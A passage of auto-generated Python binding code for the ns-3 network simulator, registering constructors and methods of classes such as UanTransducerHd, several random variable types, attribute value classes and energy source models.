[param('ns3::Ptr< ns3::UanPhy >', 'src'), param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txMode')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3UanTransducerHd_methods(root_module, cls):
## uan-transducer-hd.h (module 'uan'): ns3::UanTransducerHd::UanTransducerHd(ns3::UanTransducerHd const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanTransducerHd const &', 'arg0')])
## uan-transducer-hd.h (module 'uan'): ns3::UanTransducerHd::UanTransducerHd() [constructor]
cls.add_constructor([])
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::AddPhy(ns3::Ptr<ns3::UanPhy> arg0) [member function]
cls.add_method('AddPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'arg0')],
is_virtual=True)
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-transducer-hd.h (module 'uan'): std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & ns3::UanTransducerHd::GetArrivalList() const [member function]
cls.add_method('GetArrivalList',
'std::list< ns3::UanPacketArrival > const &',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): ns3::Ptr<ns3::UanChannel> ns3::UanTransducerHd::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::UanChannel >',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): std::list<ns3::Ptr<ns3::UanPhy>, std::allocator<ns3::Ptr<ns3::UanPhy> > > const & ns3::UanTransducerHd::GetPhyList() const [member function]
cls.add_method('GetPhyList',
'std::list< ns3::Ptr< ns3::UanPhy > > const &',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): ns3::UanTransducer::State ns3::UanTransducerHd::GetState() const [member function]
cls.add_method('GetState',
'ns3::UanTransducer::State',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): static ns3::TypeId ns3::UanTransducerHd::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-transducer-hd.h (module 'uan'): bool ns3::UanTransducerHd::IsRx() const [member function]
cls.add_method('IsRx',
'bool',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): bool ns3::UanTransducerHd::IsTx() const [member function]
cls.add_method('IsTx',
'bool',
[],
is_const=True, is_virtual=True)
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::Receive(ns3::Ptr<ns3::Packet> packet, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp) [member function]
cls.add_method('Receive',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp')],
is_virtual=True)
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::SetChannel(ns3::Ptr<ns3::UanChannel> chan) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'chan')],
is_virtual=True)
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::Transmit(ns3::Ptr<ns3::UanPhy> src, ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txMode) [member function]
cls.add_method('Transmit',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'src'), param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txMode')],
is_virtual=True)
## uan-transducer-hd.h (module 'uan'): void ns3::UanTransducerHd::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UniformRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::UniformRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable::UniformRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMin() const [member function]
cls.add_method('GetMin',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMax() const [member function]
cls.add_method('GetMax',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue(double min, double max) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'min'), param('double', 'max')])
## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger(uint32_t min, uint32_t max) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'min'), param('uint32_t', 'max')])
## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3WeibullRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::WeibullRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable::WeibullRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetScale() const [member function]
cls.add_method('GetScale',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetShape() const [member function]
cls.add_method('GetShape',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue(double scale, double shape, double bound) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'scale'), param('double', 'shape'), param('double', 'bound')])
## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger(uint32_t scale, uint32_t shape, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'scale'), param('uint32_t', 'shape'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3ZetaRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZetaRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable::ZetaRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetAlpha() const [member function]
cls.add_method('GetAlpha',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue(double alpha) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'alpha')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger(uint32_t alpha) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'alpha')])
## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3ZipfRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZipfRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable::ZipfRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetAlpha() const [member function]
cls.add_method('GetAlpha',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue(uint32_t n, double alpha) [member function]
cls.add_method('GetValue',
'double',
[param('uint32_t', 'n'), param('double', 'alpha')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger(uint32_t n, uint32_t alpha) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'n'), param('uint32_t', 'alpha')])
## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3BooleanChecker_methods(root_module, cls):
## boolean.h (module 'core'): ns3::BooleanChecker::BooleanChecker() [constructor]
cls.add_constructor([])
## boolean.h (module 'core'): ns3::BooleanChecker::BooleanChecker(ns3::BooleanChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::BooleanChecker const &', 'arg0')])
return
def register_Ns3BooleanValue_methods(root_module, cls):
cls.add_output_stream_operator()
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue(ns3::BooleanValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::BooleanValue const &', 'arg0')])
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue() [constructor]
cls.add_constructor([])
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue(bool value) [constructor]
cls.add_constructor([param('bool', 'value')])
## boolean.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::BooleanValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## boolean.h (module 'core'): bool ns3::BooleanValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## boolean.h (module 'core'): bool ns3::BooleanValue::Get() const [member function]
cls.add_method('Get',
'bool',
[],
is_const=True)
## boolean.h (module 'core'): std::string ns3::BooleanValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## boolean.h (module 'core'): void ns3::BooleanValue::Set(bool value) [member function]
cls.add_method('Set',
'void',
[param('bool', 'value')])
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3Channel_methods(root_module, cls):
## channel.h (module 'network'): ns3::Channel::Channel(ns3::Channel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Channel const &', 'arg0')])
## channel.h (module 'network'): ns3::Channel::Channel() [constructor]
cls.add_constructor([])
## channel.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Channel::GetDevice(uint32_t i) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## channel.h (module 'network'): uint32_t ns3::Channel::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## channel.h (module 'network'): uint32_t ns3::Channel::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## channel.h (module 'network'): static ns3::TypeId ns3::Channel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3ConstantRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ConstantRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable::ConstantRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetConstant() const [member function]
cls.add_method('GetConstant',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue(double constant) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'constant')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger(uint32_t constant) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'constant')])
## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3DeterministicRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::DeterministicRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable::DeterministicRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): void ns3::DeterministicRandomVariable::SetValueArray(double * values, uint64_t length) [member function]
cls.add_method('SetValueArray',
'void',
[param('double *', 'values'), param('uint64_t', 'length')])
## random-variable-stream.h (module 'core'): double ns3::DeterministicRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::DeterministicRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3DeviceEnergyModel_methods(root_module, cls):
## device-energy-model.h (module 'energy'): ns3::DeviceEnergyModel::DeviceEnergyModel(ns3::DeviceEnergyModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DeviceEnergyModel const &', 'arg0')])
## device-energy-model.h (module 'energy'): ns3::DeviceEnergyModel::DeviceEnergyModel() [constructor]
cls.add_constructor([])
## device-energy-model.h (module 'energy'): void ns3::DeviceEnergyModel::ChangeState(int newState) [member function]
cls.add_method('ChangeState',
'void',
[param('int', 'newState')],
is_pure_virtual=True, is_virtual=True)
## device-energy-model.h (module 'energy'): double ns3::DeviceEnergyModel::GetCurrentA() const [member function]
cls.add_method('GetCurrentA',
'double',
[],
is_const=True)
## device-energy-model.h (module 'energy'): double ns3::DeviceEnergyModel::GetTotalEnergyConsumption() const [member function]
cls.add_method('GetTotalEnergyConsumption',
'double',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## device-energy-model.h (module 'energy'): static ns3::TypeId ns3::DeviceEnergyModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## device-energy-model.h (module 'energy'): void ns3::DeviceEnergyModel::HandleEnergyDepletion() [member function]
cls.add_method('HandleEnergyDepletion',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## device-energy-model.h (module 'energy'): void ns3::DeviceEnergyModel::SetEnergySource(ns3::Ptr<ns3::EnergySource> source) [member function]
cls.add_method('SetEnergySource',
'void',
[param('ns3::Ptr< ns3::EnergySource >', 'source')],
is_pure_virtual=True, is_virtual=True)
## device-energy-model.h (module 'energy'): double ns3::DeviceEnergyModel::DoGetCurrentA() const [member function]
cls.add_method('DoGetCurrentA',
'double',
[],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3DoubleValue_methods(root_module, cls):
## double.h (module 'core'): ns3::DoubleValue::DoubleValue() [constructor]
cls.add_constructor([])
## double.h (module 'core'): ns3::DoubleValue::DoubleValue(ns3::DoubleValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DoubleValue const &', 'arg0')])
## double.h (module 'core'): ns3::DoubleValue::DoubleValue(double const & value) [constructor]
cls.add_constructor([param('double const &', 'value')])
## double.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::DoubleValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## double.h (module 'core'): bool ns3::DoubleValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## double.h (module 'core'): double ns3::DoubleValue::Get() const [member function]
cls.add_method('Get',
'double',
[],
is_const=True)
## double.h (module 'core'): std::string ns3::DoubleValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## double.h (module 'core'): void ns3::DoubleValue::Set(double const & value) [member function]
cls.add_method('Set',
'void',
[param('double const &', 'value')])
return
def register_Ns3EmpiricalRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable::EmpiricalRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::CDF(double v, double c) [member function]
cls.add_method('CDF',
'void',
[param('double', 'v'), param('double', 'c')])
## random-variable-stream.h (module 'core'): uint32_t ns3::EmpiricalRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::EmpiricalRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::Interpolate(double arg0, double arg1, double arg2, double arg3, double arg4) [member function]
cls.add_method('Interpolate',
'double',
[param('double', 'arg0'), param('double', 'arg1'), param('double', 'arg2'), param('double', 'arg3'), param('double', 'arg4')],
visibility='private', is_virtual=True)
## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::Validate() [member function]
cls.add_method('Validate',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EnergySource_methods(root_module, cls):
## energy-source.h (module 'energy'): ns3::EnergySource::EnergySource(ns3::EnergySource const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EnergySource const &', 'arg0')])
## energy-source.h (module 'energy'): ns3::EnergySource::EnergySource() [constructor]
cls.add_constructor([])
## energy-source.h (module 'energy'): void ns3::EnergySource::AppendDeviceEnergyModel(ns3::Ptr<ns3::DeviceEnergyModel> deviceEnergyModelPtr) [member function]
cls.add_method('AppendDeviceEnergyModel',
'void',
[param('ns3::Ptr< ns3::DeviceEnergyModel >', 'deviceEnergyModelPtr')])
## energy-source.h (module 'energy'): void ns3::EnergySource::DisposeDeviceModels() [member function]
cls.add_method('DisposeDeviceModels',
'void',
[])
## energy-source.h (module 'energy'): ns3::DeviceEnergyModelContainer ns3::EnergySource::FindDeviceEnergyModels(ns3::TypeId tid) [member function]
cls.add_method('FindDeviceEnergyModels',
'ns3::DeviceEnergyModelContainer',
[param('ns3::TypeId', 'tid')])
## energy-source.h (module 'energy'): ns3::DeviceEnergyModelContainer ns3::EnergySource::FindDeviceEnergyModels(std::string name) [member function]
cls.add_method('FindDeviceEnergyModels',
'ns3::DeviceEnergyModelContainer',
[param('std::string', 'name')])
## energy-source.h (module 'energy'): double ns3::EnergySource::GetEnergyFraction() [member function]
cls.add_method('GetEnergyFraction',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## energy-source.h (module 'energy'): double ns3::EnergySource::GetInitialEnergy() const [member function]
cls.add_method('GetInitialEnergy',
'double',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## energy-source.h (module 'energy'): ns3::Ptr<ns3::Node> ns3::EnergySource::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True)
## energy-source.h (module 'energy'): double ns3::EnergySource::GetRemainingEnergy() [member function]
cls.add_method('GetRemainingEnergy',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## energy-source.h (module 'energy'): double ns3::EnergySource::GetSupplyVoltage() const [member function]
cls.add_method('GetSupplyVoltage',
'double',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## energy-source.h (module 'energy'): static ns3::TypeId ns3::EnergySource::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## energy-source.h (module 'energy'): void ns3::EnergySource::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## energy-source.h (module 'energy'): void ns3::EnergySource::StartDeviceModels() [member function]
cls.add_method('StartDeviceModels',
'void',
[])
## energy-source.h (module 'energy'): void ns3::EnergySource::UpdateEnergySource() [member function]
cls.add_method('UpdateEnergySource',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## energy-source.h (module 'energy'): void ns3::EnergySource::BreakDeviceEnergyModelRefCycle() [member function]
cls.add_method('BreakDeviceEnergyModelRefCycle',
'void',
[],
visibility='protected')
## energy-source.h (module 'energy'): double ns3::EnergySource::CalculateTotalCurrent() [member function]
cls.add_method('CalculateTotalCurrent',
'double',
[],
visibility='protected')
